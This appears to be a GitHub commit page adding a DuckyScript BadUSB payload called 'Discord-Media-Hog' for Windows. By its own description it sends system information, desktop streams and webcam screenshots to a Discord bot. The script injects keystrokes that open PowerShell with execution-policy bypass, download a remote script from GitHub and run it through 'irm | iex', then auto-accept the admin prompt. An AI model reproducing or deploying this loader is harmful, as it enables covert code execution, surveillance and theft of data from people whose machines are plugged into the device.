Skip to content

Commit

Permalink
Add files via upload
Browse files Browse the repository at this point in the history
  • Loading branch information
beigeworm authored Jul 1, 2024
1 parent 009d65d commit f2c2531
Show file tree
Hide file tree
Showing 2 changed files with 586 additions and 0 deletions.
19 changes: 19 additions & 0 deletions Discord-Media-Hog/Discord-Media-Hog.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,19 @@
REM Title: Discord-Media-Hog
REM Author: @beigeworm | https://github.com/beigeworm
REM Description: Uses a Discord bot to send system information, a stream desktop and webcam screenshots
REM Description: READ SETUP IN MAIN.PS1
REM Target: Windows 10

REM *REQUIREMENTS*
REM admin required for disable USB function.

REM some setup for dukie script.
DEFAULT_DELAY 100

REM open powershell (remove -W Hidden to show the window).
GUI r
DELAY 750
STRING powershell -Exec Bypass -C $uri = ''; irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/BadUSB-Detect-and-Protect/main.ps1 | iex
CTRL-SHIFT ENTER
DELAY 2500
ALT y
Loading

0 comments on commit f2c2531

Please sign in to comment.